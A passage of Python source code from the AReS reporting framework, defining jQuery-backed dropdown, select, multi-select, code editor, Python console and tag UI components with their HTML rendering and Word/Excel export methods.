self.jsFrg(evts, '''
event.stopPropagation(); $("#%(htmlId)s_button").html(data.event_val);
if ( '%(htmlCode)s' != 'None') { %(breadCrumVar)s['params']['%(htmlCode)s'] = %(jsEventVal)s } ;
''' % {'htmlId': self.htmlId, 'htmlCode': self.htmlCode, 'jsEventVal': self.jsEventVal, 'breadCrumVar': self.aresObj.jsGlobal.breadCrumVar})
@property
def jsQueryData(self):
"""
:category: Javascript function
:rubric: JS
:example: >>> myObj.jsQueryData
:dsc: Python function to define the Javascript object to be passed in case of Ajax call internally or via external REST service with other languages
:return: Javascript String of the data to be used in a jQuery call
:link ajax call: http://api.jquery.com/jquery.ajax/
"""
return "{event_val: %s, event_code: '%s'}" % (self.jsEventVal, self.htmlId)
@property
def jsEventVal(self): return "$(this).contents()[0].text"
def initVal(self, val, isPyData=True):
"""
:category: Javascript On-Load function
:rubric: JS
:example: >>> myObj.initVal('Test')
:dsc:
This function will set the initial value selected by the SelectDropDown component.
"""
if isPyData:
val = json.dumps(val)
self.aresObj.jsOnLoadFnc.add('$("#%(htmlId)s_button").html(%(jsVal)s)' % {"htmlId": self.htmlId, "jsVal": val})
def setDefault(self, value, isPyData=True):
"""
:category: Javascript Global variable
:rubric: JS
:example: >>> myObj.setDefault( 'btn-default' )
:dsc:
Set the default value selected to the dropdown box
"""
if isPyData:
value = json.dumps(value)
self.aresObj.jsGlobal.add("%s = %s;" % (self.htmlId, value))
@property
def val(self):
"""
:category: Javascript function
:rubric: JS
:example: >>> myObj.val
:returns: Javascript string with the function to get the current value of the component
:dsc:
Property to get the jquery value of the HTML object in a python HTML object.
This method can be used in any jsFunction to get the value of a component in the browser.
This method will only be used on the javascript side, so please do not consider it in your algorithm in Python
"""
return '$("#%s_button").html()' % self.htmlId
@property
def eventId(self): return "$('#%s li')" % self.htmlId
def onDocumentLoadFnc(self):
self.addGlobalFnc("%s(htmlObj, data, jsStyles)" % self.__class__.__name__, '''
if (jsStyles.clearDropDown) { htmlObj.empty() ; } ;
data.forEach(function(rec){
if (rec.subItems != undefined) {
var li = $('<li class="dropdown-submenu"></li>' ).css( jsStyles.dropdown_submenu );
var a = $('<a class="dropdown-item" tabindex="-1" href="#" style="display:inline-block"><span style="display:inline-block;float:left">' + rec.value + '</span></a>').css( jsStyles.a_dropdown_item )
.append('<i class="fas fa-caret-right" style="display:inline-block;float:right"></i>');
li.append( a ); var ul = $('<ul class="dropdown-menu"></ul>'); li.append( ul ); jsStyles.clearDropDown = false;
htmlObj.append( li ); %(pyCls)s(ul, rec.subItems, jsStyles) ;
} else {
if (rec.disable == true) {htmlObj.append('<li class="dropdown-item disabled"><a tabindex="-1" href="#">' + rec.value + '</a></li>');}
else {
if (rec.url == undefined) { var a = $('<a class="dropdown-item" tabindex="-1" href="#">' + rec.value + '</a>').css( jsStyles.a_dropdown_item ); }
else { var a = $('<a class="dropdown-item" tabindex="-1" href="' + rec.url + '">' + rec.value + '</a>').css( jsStyles.a_dropdown_item ); }
a.css( jsStyles.a_dropdown_item );
var li = $('<li class="dropdown-submenu"></li>' ).css( jsStyles.dropdown_submenu );
li.append( a ); htmlObj.append( li )
}
}
}) ; ''' % {"pyCls": self.__class__.__name__} )
def __str__(self):
""" String representation of a Drop Down item """
return '''
<div class="dropdown" %(cssAttr)s>
<button id="%(htmlId)s_button" class="%(class)s" style="font-weight:bold;width:100%%;font-size:12px;background-color:%(darkBlue)s;color:%(color)s" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">%(title)s<span class="caret"></span></button>
<ul class="dropdown-menu" id="%(htmlId)s" aria-labelledby="dropdownMenu"></ul>
</div> ''' % {'cssAttr': self.strAttr(withId=False), 'class': self.getClass(), 'title': self.title, 'htmlId': self.htmlId,
'darkBlue': self.getColor('blueColor', 2), 'color': self.getColor('greyColor', 0)}
def to_word(self, document):
p = document.add_paragraph()
p.add_run("Selected: ")
runner = p.add_run( self.aresObj.http.get(self.htmlCode, self.vals) )
runner.bold = True
def to_xls(self, workbook, worksheet, cursor):
if self.htmlId in self.aresObj.http:
cellTitle = self.title if self.title != "" else 'Input'
cell_format = workbook.add_format({'bold': True})
worksheet.write(cursor['row'], 0, cellTitle, cell_format)
cursor['row'] += 1
worksheet.write(cursor['row'], 0, self.aresObj.http[self.htmlId] )
cursor['row'] += 2
class Select(AresHtml.Html):
"""
:category: Ares Component
:rubric: HTML
:type:
:dsc:
"""
# TODO: Extend the python object to handle multi select and all the cool features
cssCls = ["selectpicker show-tick"]
references = {'Example': 'https://silviomoreto.github.io/bootstrap-select/examples/',
'Bootstrap Definition': 'https://www.npmjs.com/package/bootstrap-select-v4',
'Jquery Events': 'https://www.jqueryscript.net/form/Bootstrap-4-Dropdown-Select-Plugin-jQuery.html'}
__reqCss, __reqJs = ['select'], ['select']
__pyStyle = ['CssSelect']
name, category, callFnc, docCategory = 'Simple Select', 'Select', 'select', 'Advanced'
def __init__(self, aresObj, recordSet, title, htmlCode, dataSrc, event, selected, docBlock, allSelected, label, width,
widthUnit, height, heightUnit, dfColumn, globalFilter):
""" Instantiate the object and store the selected item """
selectedVal, self.container, self.label = None, None, label
if recordSet is not None:
if issubclass(type(recordSet), ares_pandas.DataFrame) and dfColumn is not None:
if globalFilter is not None:
if globalFilter is True:
if htmlCode is None:
raise Exception("Please set a htmlCode to the %s to use this as a filter" % self.callFnc)
dataId, dataCode = id(recordSet), None
for key, src in aresObj.jsSources.items():
if src.get('dataId') == dataId:
dataCode = key
break
if not hasattr(recordSet, 'htmlCode') and dataCode is None:
dataCode = "ares_id_%s" % len(aresObj.jsSources)
recordSet = aresObj.df(recordSet, htmlCode=dataCode)
dataCode = recordSet.htmlCode
globalFilter = {'jsId': dataCode, 'colName': dfColumn}
if not dataCode in aresObj.jsSources:
aresObj.jsSources[dataCode] = {'dataId': dataId, 'containers': [], 'data': recordSet}
aresObj.jsSources[dataCode]['containers'].append(self)
recordSet = recordSet[dfColumn].unique().tolist()
elif isinstance(recordSet, set):
recordSet = list(recordSet)
elif isinstance(recordSet, dict):
recordSet = [{'value': v, 'name': k} for k, v in recordSet.items()]
if recordSet and not isinstance(recordSet[0], dict):
if docBlock is not None:
if not isinstance(docBlock, dict):
docBlock = {"id": docBlock}
docBlock['params'] = recordSet
if selected is not None:
docBlock['params'] = "%s, selected='%s'" % (docBlock['params'], selected)
recordSet = [{'value': val, 'selected': True} if val == selected else {'value': val} for val in recordSet]
elif selected is not None:
for rec in recordSet:
if rec['value'] == selected:
rec['selected'] = True
if htmlCode in aresObj.http:
if recordSet is None:
recordSet = [{'name': aresObj.http[htmlCode], 'value': aresObj.http[htmlCode]}]
for rec in recordSet:
if rec['value'] == aresObj.http[htmlCode]:
rec['selected'] = True
selectedVal = rec['value']
title = aresObj.http[htmlCode]
else:
rec['selected'] = False
if allSelected:
recordSet = [{'name': 'All', 'value': ''}] + recordSet
super(Select, self).__init__(aresObj, recordSet, htmlCode=htmlCode, docBlock=docBlock, width=width, widthUnit=widthUnit,
height=height, heightUnit=heightUnit, globalFilter=globalFilter)
if dataSrc is not None and dataSrc.get('on_init', False):
self.vals = self.onInit(htmlCode, dataSrc)
for rec in self.vals:
if rec['value'] == aresObj.http.get(htmlCode):
rec['selected'] = True
selectedVal = rec['value']
title = aresObj.http[htmlCode]
else:
rec['selected'] = False
self.title, self.htmlCode, self.dataSrc, self.selectStyle = title, htmlCode, dataSrc, []
self.aresObj.jsOnLoadFnc.add('%s.selectpicker( {liveSearch: true, style: "show-menu-arrow"} );' % self.jqId)
if htmlCode is not None:
if selectedVal is not None:
self.aresObj.jsOnLoadFnc.add("%s.val('%s')" % (self.jqId, selectedVal))
self.css({'padding': 0, 'clear': 'both', 'margin': '5px 0'})
if event is not None:
self.change(aresObj.jsPost(event['script'], event.get('htmlCodes'), event.get('success', '')))
def initVal(self, val):
"""
:category: Python function
:rubric: PY
:example: >>> myObj.initVal( 'test' )
:dsc:
Set the initial value of the select HTML component
"""
for rec in self.vals:
rec['selected'] = True if rec['value'] == val else False
@property
def jsQueryData(self):
return "{event_val: %s.val(), event_code: '%s', event_icon: %s.find(':selected').data('icon')}" % (self.jqId, self.htmlId, self.jqId)
@property
def jqId(self):
"""
:category: Javascript function
:rubric: JS
:example: >>> myObj.jqId
:dsc: Python property to get a unique Jquery ID function for a given AReS Object
:return: Javascript String of the variable used to defined the Jquery object in Javascript
"""
return "$('#%s select')" % self.htmlId
def setSelectCss(self, cssClss):
"""
:category: Table Definition
:rubric: CSS
:type: Style
:dsc:
:return: The Python Datatable object
"""
for cssCls in cssClss:
self.addPyCss(cssCls)
self.selectStyle.append(self.aresObj.cssObj.get(cssCls)().classname)
return self
def jsLoad(self, jsData, isPyData=False):
if isPyData:
jsData = json.dumps(jsData)
return "%(builder)s($('#%(htmlId)s_select'), %(jsData)s); " % { 'builder': self.__class__.__name__, 'htmlId': self.htmlId, 'jsData': jsData}
def jsLoadFromSrc(self, outKey): return '''
var params = %(script)s; var attr = {} ;
if (params.htmlCodes != undefined) {params.htmlCodes.forEach( function(code) {attr[code] = %(breadCrumbVar)s['params'][code] ; }); } ;
$.ajax({ url: "/reports/data/%(report_name)s/" + params.script, method: "POST", data: JSON.stringify(attr, null, '\t'), contentType: 'application/json;charset=UTF-8', cache: false
}).done( function(data) { var results = JSON.parse(data); %(jsLoad)s;
if (results.aresPopup != undefined) {
$('#popup').html(results.aresPopup);
$('#popup').css( {'top': '140px', 'right': '20px', 'position': 'fixed', 'padding': '10px 20px 10px 20px', 'border': '1px solid %(grey)s', 'border-radius': '5px' } ) ;
$('#popup').show() ; $('#popup').fadeOut(3000) ; }
}).fail( function(data) { });
''' % {'script': self.dataSrc, 'jsLoad': self.jsLoad('results.%s' % outKey), 'breadCrumbVar': self.aresObj.jsGlobal.breadCrumVar,
'report_name': self.aresObj.report_name, 'grey': self.getColor('greyColor', 3) }
def onDocumentLoadFnc(self):
""" Pure Javascript onDocumentLoad Function """
self.addGlobalFnc("%s(htmlObj, data)" % self.__class__.__name__, ''' htmlObj.empty() ;
var categories = {} ; var cats = [] ; var selectedVals = [];
data.forEach(function(rec){
if (rec.category == undefined) { rec.category = 'None' ; }
if (rec.category in categories) { categories[rec.category].push(rec) ; }
else { categories[rec.category] = [rec] ; cats.push(rec.category) ; }}) ;
cats.forEach(function(cat){
if (cat != 'None') {
var optgroup = $('<optgroup label="'+ cat + '">' + cat + '</optgroup>') ;
categories[cat].forEach(function(rec){
if (rec.selected == true) { var selected = 'selected=true'} else { var selected = ''};
if (rec.name == undefined) { rec.name = rec.value };
if (rec.icon != undefined) { options = options + 'data-icon="'+ rec.icon +'"'};
optgroup.append('<option value="' + rec.value + '" ' + selected + '>' + rec.name + '</option>')}) ;
htmlObj.append(optgroup)}
else {
categories[cat].forEach(function(rec){
var options = ' ';
if (rec.selected == true) { var selected = 'selected'; selectedVals.push(rec.value) } else { var selected = ''};
if (rec.name == undefined) { rec.name = rec.value };
if (rec.icon != undefined) { options = options + 'data-icon="'+ rec.icon +'"'};
if (rec['data-subtext'] != undefined) { options = options + ' data-subtext="' + rec['data-subtext'] + '"' };
htmlObj.append('<option value="' + rec.value + '" ' + selected + options + '>' + rec.name + '</option>')}) ;
} }) ; htmlObj.selectpicker('refresh'); htmlObj.val(selectedVals)''')
def __str__(self):
""" Return the HTML string for a select """
containerTag = '' if self.container is None else 'data-container="%s"' % self.container
# Quick hack to be able to override the style of the title of the select
# TODO: Should be done correctly: https://developer.snapappointments.com/bootstrap-select/examples/
if len(self.selectStyle) == 0:
self.setSelectCss(['CssSelectStyle'])
selectStyle = "" if len(self.selectStyle) == 0 else 'data-style="%s"' % " ".join(self.selectStyle)
return '<div %s>%s <select %s %s title="%s"></select></div>' % (self.strAttr(pyClassNames=['CssSelect']), self.label, selectStyle, containerTag, self.title)
def to_xls(self, workbook, worksheet, cursor):
if self.htmlId in self.aresObj.http:
cellTitle = self.title if self.title != "" else 'Input'
cell_format = workbook.add_format({'bold': True})
worksheet.write(cursor['row'], 0, cellTitle, cell_format)
cursor['row'] += 1
worksheet.write(cursor['row'], 0, self.aresObj.http[self.htmlId])
cursor['row'] += 2
def to_word(self, document):
p = document.add_paragraph()
p.add_run("Selected: ")
runner = p.add_run( self.aresObj.http.get(self.htmlCode, self.vals) )
runner.bold = True
class SelectMulti(Select):
""" Python interface to the multi select element
"""
__reqCss, __reqJs = ['select'], ['select']
references = {'Example': 'https://silviomoreto.github.io/bootstrap-select/examples/'}
name, category, callFnc, docCategory = 'Multi Select', 'Select', 'selectmulti', 'Advanced'
def __init__(self, aresObj, vals, title, maxSelections, htmlCode, dataSrc, event, selectedItems, docBlock, label,
width, widthUnit, height, heightUnit, dfColumn, globalFilter):
""" Instantiate the Drop Down button """
if vals is not None:
selectedItems = [] if selectedItems is None else selectedItems
if issubclass(type(vals), ares_pandas.DataFrame):
if globalFilter:
globalFilter = {'jsId': vals.htmlCode, 'colName': dfColumn}
vals = vals[dfColumn].unique().tolist()
elif isinstance(vals, list) and isinstance(vals[0], str):
vals = [{'value': val, 'selected': True} if val in selectedItems else {'value': val} for val in vals]
elif selectedItems:
for rec in vals:
if rec['value'] in selectedItems:
rec['selected'] = True
super(SelectMulti, self).__init__(aresObj, vals, title, htmlCode, dataSrc, event, None, docBlock, False, label, width,
widthUnit, height, heightUnit, dfColumn, globalFilter)
if dataSrc is not None and dataSrc.get('on_init', False):
recordSet = self.onInit(htmlCode, dataSrc)
self.vals = recordSet
if htmlCode in self.aresObj.http:
for val in self.aresObj.http[htmlCode].split(","):
for rec in self.vals:
if val == rec['value']:
rec['selected'] = True
self.title, self.maxSelections = title, maxSelections
if htmlCode is not None:
self.aresObj.htmlCodes[self.htmlCode] = self
# self.change('') # Add the onchange method to update the breadcrumb
def initVal(self, val):
for rec in self.vals:
rec['selected'] = True if rec['value'] in val.split(",") else False
def selected(self, vals):
""" Set default selected values """
self.aresObj.jsOnLoadFnc.add("%s.val(%s); %s.selectpicker('refresh');" % (self.jqId, json.dumps(vals), self.jqId))
def __str__(self):
""" Return the HTML string for a select """
containerTag = '' if self.container is None else 'data-container="%s"' % self.container
# Quick hack to be able to override the style of the title of the select
# TODO: Should be done correctly: https://developer.snapappointments.com/bootstrap-select/examples/
selectStyle = "" if len(self.selectStyle) == 0 else 'data-style="%s"' % " ".join(self.selectStyle)
return '''
<div %s>%s
<select %s multiple data-max-options="%s" %s data-actions-box="true" data-width="auto" title="%s"></select>
</div>''' % (self.strAttr(pyClassNames=['CssSelect']), self.label, selectStyle, self.maxSelections, containerTag, self.title)
```
#### File: Lib/html/AresHtmlTextEditor.py
```python
import json
from ares.Lib.html import AresHtml
class Editor(AresHtml.Html):
name, category, callFnc, docCategory = 'Code Editor', 'Text', 'editor', 'Preformatted'
__pyStyle = ['CssDivEditor']
__reqCss, __reqJs = ['codemirror'], ['codemirror']
def __init__(self, aresObj, vals, size, language, width, widthUnit, height, heightUnit, isEditable, htmlCode):
super(Editor, self).__init__(aresObj, vals, width=width, widthUnit=widthUnit, height=height, heightUnit=heightUnit, code=htmlCode)
self.size, self.isEditable = self.aresObj.pyStyleDfl['fontSize'] if size is None else "%spx" % size, isEditable
self._jsStyles, self._jsActions, self._definedActions = {'language': language}, {}, ['run', 'load', 'auto', 'clone', 'save', 'delete']
self.css( {'font-size': self.size } )
self.addGlobalVar('%s_editor' % self.htmlId)
@property
def val(self):
""" Property to get the jquery value of the HTML object in a python HTML object """
return '%(htmlId)s_editor.getValue()' % {"htmlId": self.htmlId}
@property
def jsQueryData(self):
"""
:category: Javascript function
:rubric: JS
:example: >>> myObj.jsQueryData
:dsc:
Python function to define the Javascript object to be passed in case of Ajax call internally or via external REST service with other languages
:return: Javascript String of the data to be used in a jQuery call
:link ajax call: http://api.jquery.com/jquery.ajax/
"""
return "{ event_val: %(htmlId)s_editor.getValue(), event_code: '%(htmlId)s' }" % {"htmlId": self.htmlId}
@property
def jsClear(self):
return "%(htmlId)s_editor.setValue('')" % {"htmlId": self.htmlId}
def trigger(self, event):
if event in ['load', 'run']:
self._triggerEvents.add("$('#%(htmlId)s_%(action)s').trigger('click')" % {"htmlId": self.htmlId, "action": event})
else:
return super(Editor, self).trigger(event)
def onDocumentReady(self):
self.jsUpdateDataFnc = '''
%(pyCls)s(%(jqId)s, %(htmlId)s_data, %(jsStyles)s) ;
if(%(htmlCode)s != null) { %(breadCrumVar)s['params'][%(htmlCode)s] = %(jsVal)s };
''' % {'pyCls': self.__class__.__name__, 'jqId': self.jqId, 'htmlId': self.htmlId, 'htmlCode': json.dumps(self.htmlCode),
'jsVal': self.val, 'breadCrumVar': self.aresObj.jsGlobal.breadCrumVar, 'jsStyles': json.dumps(self._jsStyles)}
if self.dataSrc is None or self.dataSrc.get('type') != 'url':
self.aresObj.jsOnLoadFnc.add(self.jsUpdateDataFnc)
def onDocumentLoadFnc(self):
""" Pure Javascript onDocumentLoad Function """
self.addGlobalFnc("%s(htmlObj, data, jsStyles)" % self.__class__.__name__, '''
if (window[htmlObj.attr('id') + '_editor'] == undefined) {
window[htmlObj.attr('id') + '_editor'] = CodeMirror.fromTextArea( htmlObj.get(0), {lineNumbers: true, mode: jsStyles.language} ) ; }
window[htmlObj.attr('id') + '_editor'].setValue(data);
if ($('#'+ htmlObj.attr('id') +'_save').length != 0) {
window[htmlObj.attr('id') + '_editor'].on('keydown', function(i, e) {
if (e.ctrlKey && e.keyCode == 83) {
e.preventDefault();
$('#'+ htmlObj.attr('id') +'_save').trigger('click'); }
}) ;
} ;
$('#'+ htmlObj.attr('id') +'_updated').text('Last update: ' + Today() ) ;
window[htmlObj.attr('id') + '_editor'].getWrapperElement().style["overflow"] = "hidden";
window[htmlObj.attr('id') + '_editor'].getWrapperElement().style["height"] = "100%"; ''')
def jsAction(self, jsFncs, icon, pyCssCls, tooltip, action):
"""
:category: Python function
:rubric: PY
:example: >>>
:dsc:
Define the event on the editor when the save is clicked.
This will call a Ajax service.
:return: The object itself
"""
if not isinstance(jsFncs, list):
jsFncs = [jsFncs]
if action not in self._definedActions:
self._definedActions.append(action)
self._jsActions[action] = "<span id='%(htmlId)s_%(action)s' title='%(tooltip)s' class='%(cssStyle)s %(icon)s'></span>" % {
"icon": icon, "cssStyle": self.addPyCss(pyCssCls), "htmlId": self.htmlId, 'tooltip': tooltip, 'action': action}
self.aresObj.jsOnLoadFnc.add("$('#%(htmlId)s_%(action)s').on('click', function(event) { %(jsFncs)s; })" % {"htmlId": self.htmlId, "jsFncs": ";".join(jsFncs), 'action': action})
return self
# --------------------------------------------------------------------------------------------------------------
# EDITOR STANDARD EVENTS
#
# None of those functions are based on an Ajax call as I do not thing they are supposed to do something special in case of
# success or failure of an internal event. Problems are tackled in the standard way using the ares popup message (and the status for the color)
def save(self, jsFncs, icon='fas fa-save', pyCssCls="CssSmallIcon", tooltip='click to save changes'):
"""
:example: >>> editor.save( aresObj.jsPost( "/reports/create/script", [editor]) )
:wrap jsAction:
:return:
"""
if not isinstance(jsFncs, list):
jsFncs = [jsFncs]
jsFncs = ["var data = %(data)s;" % {"data": self.jsQueryData}] + jsFncs
return self.jsAction(jsFncs, icon, pyCssCls, tooltip, 'save')
def delete(self, jsFncs, icon='fas fa-times-circle', pyCssCls="CssSmallIconRed", tooltip='click to delete the function'):
return self.jsAction(jsFncs, icon, pyCssCls, tooltip, 'delete')
def run(self, jsFncs, icon='fas fa-play', pyCssCls="CssSmallIcon", tooltip='Run button on the Editor Component'):
return self.jsAction(jsFncs, icon, pyCssCls, tooltip, 'run')
def clone(self, jsFncs, icon='fas fa-copy', pyCssCls="CssSmallIcon", tooltip='Create a copy of the script'):
return self.jsAction(jsFncs, icon, pyCssCls, tooltip, 'clone')
def load(self, jsFncs, icon='fas fa-sync', pyCssCls="CssSmallIcon", tooltip='Load button on the Editor Component', interval=5000):
if not isinstance(jsFncs, list):
jsFncs = [jsFncs]
jsFncs.append( "$('#%s_updated').text('Last update: ' + Today() )" % self.htmlId)
self.jsAction(jsFncs, icon, pyCssCls, tooltip, 'load')
jsFncsAuto = ['''
$(this).toggleClass('fa-pulse');
if ( window['%(htmlId)s_interval'] == undefined) { window['%(htmlId)s_interval'] = setInterval( function() { $("#%(htmlId)s_load").trigger('click'); }, %(interval)s ); }
else {
if( $(this).hasClass('fa-pulse') ) { window['%(htmlId)s_interval'] = setInterval( function() { $("#%(htmlId)s_load").trigger('click'); }, %(interval)s ); }
else { clearInterval( window['%(htmlId)s_interval'] ) ;}} ; ''' % {'interval': interval, "htmlId": self.htmlId}]
return self.jsAction(jsFncsAuto, "fas fa-clock", pyCssCls, "Auto Update button on the Editor Component", 'auto')
def download(self, jsFncs='', icon='fas fa-file-download', pyCssCls="CssSmallIcon", tooltip='Download temporary version of the script'):
if not isinstance(jsFncs, list):
jsFncs = [jsFncs]
jsFncs.append("event.stopPropagation(); %s; return false;" % self.aresObj.jsDownload( fileName="tempScript.py", jsData="window['%s_editor'].getValue()" % self.htmlId))
return self.jsAction(jsFncs, icon, pyCssCls, tooltip, 'clone')
def __str__(self):
events = []
for action in self._definedActions:
if action in self._jsActions:
events.append( self._jsActions[action] )
return '''
<div style="display:inline-block;width:100%%;padding:5px 5px 5px 25px">
%(events)s
<span id='%(htmlId)s_updated' style='float:right;font-style:italic;margin-right:10px;display:inline-block:width:100%%'></span>
</div>
<textarea %(attr)s>%(vals)s</textarea>
''' % {'attr': self.strAttr(pyClassNames=self.__pyStyle), "vals": self.vals, 'htmlId': self.htmlId, 'events': "".join(events)}
class Console(AresHtml.Html):
"""
"""
name, category, callFnc, docCategory = 'Python Cell Runner', 'Text', 'pytestcell', 'Preformatted'
__reqCss, __reqJs = ['codemirror'], ['codemirror']
def __init__(self, aresObj, vals, size, width, widthUnit, height, heightUnit, isEditable, htmlCode):
super(Console, self).__init__(aresObj, vals, width=width, widthUnit=widthUnit, height=height, heightUnit=heightUnit, code=htmlCode)
self.size, self.isEditable = self.aresObj.pyStyleDfl['fontSize'] if size is None else "%spx" % size, isEditable
self._jsRun, self._jsSave = '', ''
self.addGlobalVar("%s_count" % self.htmlId, "0")
self.css({'font-size': self.size, 'padding': '10px', "min-height": "30px", "font-family": "Arial, monospace"})
@property
def val(self):
"""
:category: Javascript function
:rubric: JS
:example: >>> myObj.val
:dsc:
Return the value of the In[] section of the editor.
:return: A String with the javascript function to get the value
"""
return '%(htmlId)s_editor.getValue()' % {"htmlId": self.htmlId}
@property
def jsQueryData(self):
"""
:category: Javascript features
:rubric: JS
:dsc:
String with the javascript feature to get the data to send when a event is triggered from this object.
Basically when the run or saved is triggered
:return: Javascript String of the data to be used in a jQuery call
:link ajax call: http://api.jquery.com/jquery.ajax/
"""
return "{ event_out: $('#%(htmlId)s_result_data').text(), event_val: %(htmlId)s_editor.getValue(), event_code: '%(htmlId)s' }" % {'htmlId': self.htmlId}
# --------------------------------------------------------------------------------------------------------------
# EDITOR STANDARD EVENTS
#
# Those are already embedding an ajax call as b default the return of those call will change the display
# Make sure you are not calling a Ajax call within an AJax call, event engine should remain simple
# Remember PEP20: Simple is better than complex.
def run(self, url=None, jsData=None, jsFncs=None, httpCodes=None, tooltip="Run the line"):
"""
:category: Javascript Event
:rubric: JS
:example: >>> myObj.run( "/reports/fncs/run/%s" % report_name )
:dsc:
Add an event action to the console object.
:return: The python object itself
"""
if not isinstance(jsFncs, list):
jsFncs = [jsFncs] if jsFncs is not None else []
jsFncs = [
"if (!data.status){ $('#%(htmlId)s_result_data').css('color', '%(redColor)s') ; } else { $('#%(htmlId)s_result_data').css('color', '%(blackColor)s') }" % {"htmlId": self.htmlId, 'redColor': self.getColor('redColor', 4), 'blackColor': self.getColor('greyColor', 8) },
"%(htmlId)s_count ++; $('#%(htmlId)s_counter').text( 'In [ '+ %(htmlId)s_count +']' )" % {"htmlId": self.htmlId},
"$('#%(htmlId)s_result_data').text(data.output); $('#%(htmlId)s_print_data').text(data.print);" % {"htmlId": self.htmlId}] + jsFncs + ["$('#%(htmlId)s_result').show();$('#%(htmlId)s_print').show();" % {"htmlId": self.htmlId} ]
self._jsRun = (self.aresObj.jsPost(url=url, jsData=jsData, jsFnc=jsFncs, httpCodes=httpCodes) if url is not None else ";".join(jsFncs), tooltip)
return self
def save(self, url=None, jsData=None, jsFncs=None, httpCodes=None, tooltip="Save the run"):
"""
:category: Javascript Event
:rubric: JS
:example: >>> myObj.run( "/reports/fncs/test/%s" % report_name )
:dsc:
Add an event action to the console object to save the result of the In and out.
:return: The python object itself
"""
if not isinstance(jsFncs, list):
jsFncs = [jsFncs] if jsFncs is not None else []
self._jsSave = (self.aresObj.jsPost(url=url, jsData=jsData, jsFnc=jsFncs, httpCodes=httpCodes) if url is not None else ";".join(jsFncs), tooltip)
return self
def __str__(self):
runButton, saveButton = '', ''
if self._jsRun != '':
self.aresObj.jsOnLoadFnc.add('''
var %(htmlId)s_editor = CodeMirror.fromTextArea( $('#%(htmlId)s').get(0), {placeholder: "aresObj.myFncs()", lineNumbers: true, mode: 'python'} ) ;
%(htmlId)s_editor.setSize(null, 30); %(htmlId)s_editor.getWrapperElement().style["line-height"] = "1.5"; %(htmlId)s_editor.refresh() ;
%(htmlId)s_editor.on('keydown', function(i, e) {
if (e.keyCode == 13) { var data = %(data)s ; e.preventDefault(); %(run)s ;}
else {
$('#%(htmlId)s_result_data').text(''); $('#%(htmlId)s_print_data').text('');
$('#%(htmlId)s_result').hide(); $('#%(htmlId)s_print').hide();}
}) ;
$('#%(htmlId)s_run').on('click', function(event) { var data = %(data)s ; %(run)s ; })''' % {"htmlId": self.htmlId, "run": self._jsRun[0], 'data': self.jsQueryData})
runButton = '<i title="%(tooltip)s" id="%(htmlId)s_run" class="%(iconCss)s fas fa-caret-right"></i>' % {'tooltip': self._jsRun[1], "htmlId": self.htmlId, "iconCss": self.addPyCss('CssStdIcon')}
if self._jsSave != '':
self.aresObj.jsOnLoadFnc.add('''
$('#%(htmlId)s_save').on('click', function(event) { var data = %(data)s ; %(save)s ; })''' % {
"htmlId": self.htmlId, "save": self._jsSave[0], 'data': self.jsQueryData})
saveButton = '<i title="%(tooltip)s" id="%(htmlId)s_run" class="%(iconCss)s far fa-save"></i>' % {'tooltip': self._jsSave[1], "htmlId": self.htmlId, "iconCss": self.addPyCss('CssOutIcon')}
return '''
<table style="width:100%%;margin-top:10px;padding:5px 0 5px 10px">
<tr>
<td style="height:100%%;width:100px;border-left:5px solid %(blueColor)s;vertical-align:middle;color:%(blueColor)s">
<span title="count number of runs" id="%(htmlId)s_counter" >In [ 0 ]</span>
%(runButton)s
</td>
<td class="%(tdRunCss)s"><textarea %(attr)s></textarea></td>
</tr>
<tr style="height:3px;display:inline-block"></tr>
<tr style="display:none" id="%(htmlId)s_result">
<td style="padding-top:10px;padding-bottom:10px;height:100%%;width:100px;border-left:5px solid blue;vertical-align:middle;color:red">
<span title="Number of store results">Out [ 0 ]</span>
%(saveButton)s
</td>
<td class="%(tdRunCss)s" id="%(htmlId)s_result_data"></td>
</tr>
<tr style="display:none;" id="%(htmlId)s_print">
<td colspan=2 style="height:100px;">
<div style="width:100%%;height:100%%;background-color:%(blackColor)s;color:%(whiteColor)s;text-align:left;padding:5px;margin-top:10px" id="%(htmlId)s_print_data" >
Server logs generated from the print command
</div>
</td>
</tr>
</table>
''' % {'attr': self.strAttr(), 'htmlId': self.htmlId, 'runButton': runButton, 'tdRunCss': self.addPyCss('CssTdEditor'), 'saveButton': saveButton,
'blackColor': self.getColor('greyColor', 8), 'whiteColor': self.getColor('greyColor', 0),
'redColor': self.getColor('redColor', 2), 'blueColor': self.getColor('blueColor', 8)}
class Tags(AresHtml.Html):
name, category, callFnc, docCategory = 'Tags', 'Text', 'tags', 'Preformatted'
__pyStyle = ['CssDivNoBorder']
"""
check unicity
remove all items
"""
def __init__(self, aresObj, vals, title, icon, width, widthUnit, height, heightUnit, htmlCode):
super(Tags, self).__init__(aresObj, vals, width=width, widthUnit=widthUnit, height=height, heightUnit=heightUnit, code=htmlCode)
self.title, self.icon = title, icon
self.css( {"margin-top": "5px"})
@property
def val(self):
"""
:category: Javascript function
:rubric: JS
:example: >>> myObj.val
:returns: Javascript string with the function to get the current value of the component
:dsc:
Property to get the jquery value of the HTML object in a python HTML object.
This method can be used in any jsFunction to get the value of a component in the browser.
This method will only be used on the javascript side, so please do not consider it in your algorithm in Python
"""
return "%(breadCrumVar)s['params']['%(htmlId)s']" % {"htmlId": self.htmlId, "breadCrumVar": self.aresObj.jsGlobal.breadCrumVar}
@property
def json(self):
return "JSON.stringify(%(breadCrumVar)s['params']['%(htmlId)s'])" % {"htmlId": self.htmlId, "breadCrumVar": self.aresObj.jsGlobal.breadCrumVar}
def jsEmpty(self):
return "%(breadCrumVar)s['params']['%(htmlId)s'] = []; $('#%(htmlId)s_tags').text('')" % {"htmlId": self.htmlId, "breadCrumVar": self.aresObj.jsGlobal.breadCrumVar}
def jsAdd(self, jsData='data', jsDataKey=None, isPyData=False):
if isPyData:
jsData = json.dumps(jsData)
else:
if jsDataKey is not None:
jsData = "%s['%s']" % (jsData, jsDataKey)
self.addGlobalFnc('RemoveSelection(srcObj, htmlId)', '''
const index = %(breadCrumVar)s['params'][htmlId].indexOf(srcObj.parent().text());
%(breadCrumVar)s['params'][htmlId].splice(index, 1);
srcObj.parent().remove(); ''' % {'breadCrumVar': self.aresObj.jsGlobal.breadCrumVar},
fncDsc="Remove the item from the Tags Html component but also from the underlying javascript variable")
return '''
if (%(breadCrumVar)s['params']['%(htmlId)s'] == undefined) {%(breadCrumVar)s['params']['%(htmlId)s'] = [] ;}
if (! %(breadCrumVar)s['params']['%(htmlId)s'].includes( %(jsData)s ) ) { %(breadCrumVar)s['params']['%(htmlId)s'].push(%(jsData)s);
